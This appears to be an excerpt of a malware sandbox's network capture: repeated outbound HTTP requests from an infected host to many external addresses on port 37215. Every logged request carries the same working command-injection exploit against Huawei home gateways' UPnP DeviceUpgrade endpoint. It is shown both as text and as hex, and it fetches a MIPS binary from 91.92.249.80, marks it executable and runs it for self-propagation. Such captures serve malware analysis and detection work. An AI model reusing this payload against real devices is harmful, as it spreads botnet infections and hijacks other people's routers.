                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1297192.168.2.233797841.249.1.5337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.328850985 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1298192.168.2.235388041.188.5.5437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.328865051 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1299192.168.2.2335754197.117.209.21037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.328875065 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1300192.168.2.23502048.84.107.7437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.328886032 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1301192.168.2.2349190197.24.40.4637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.328900099 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1302192.168.2.2349140197.106.123.22937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.328905106 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1303192.168.2.233396641.242.190.4737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.328928947 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1304192.168.2.23361184.72.82.21837215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.328933001 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1305192.168.2.2335574197.184.36.8437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.328984022 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1306192.168.2.2343542157.1.245.3837215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.329005003 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1307192.168.2.233567641.229.138.737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.329030991 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
